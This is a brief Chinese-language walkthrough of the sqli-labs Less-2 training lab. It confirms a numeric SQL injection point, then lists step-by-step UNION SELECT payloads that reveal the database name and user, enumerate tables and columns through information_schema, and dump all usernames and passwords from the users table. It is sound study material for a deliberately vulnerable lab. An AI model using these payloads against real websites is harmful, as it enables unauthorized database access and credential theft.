sqli-labs less-2

判断注入类型

1、尝试id=1

?id=1

回显正常，结果如下:

2、尝试id=1'

?id=1'

回显报错，结果如下:

3、尝试id=1--+

?id=1--+

回显正常，结果如下：

4、结论

此题为数字型注入

2、查询当前数据库

?id=0 union select 1,database(),user()--+

查询结果如下图所示：

3、查询当前数据库下面的所有表

?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

查询结果如下图所示：

4、查询数据表中的字段（以users表为例）

?id=0 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+

查询结果如下图所示：

5、查询数据表中字段的值

?id=0 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+

查询结果如下图所示：

以上就是我对这道题的解法。因本人菜鸡一只，如果有什么不对的地方，实属正常。还请各位大佬予以指正，谢谢！